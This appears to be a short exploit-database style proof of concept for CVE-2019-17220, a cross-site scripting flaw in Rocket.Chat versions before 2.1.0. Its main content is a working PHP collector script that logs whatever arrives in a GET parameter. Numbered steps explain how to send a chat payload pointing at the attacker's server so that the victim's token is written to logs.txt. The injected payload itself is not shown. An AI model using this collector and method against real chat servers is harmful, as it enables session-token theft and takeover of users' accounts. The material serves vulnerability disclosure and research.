# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
# Author: 3H34N
# Date: 2019-10-22
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
# Vulnerable Version(s): Rocket.Chat < 2.1.0
# CVE: CVE-2019-17220
# Special Thanks: Ali razmjoo, Mohammad Reza Espargham (@rezesp)

# PoC
# 1. Create l33t.php on a web server

<?php
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
$leet = $_GET['leet']."\n\n";
fwrite($output, $leet);
fclose($output);
?>

# 2. Open a chat session
# 3. Send payload with your web server url

# 4. The token will be written to logs.txt when the target sees your message.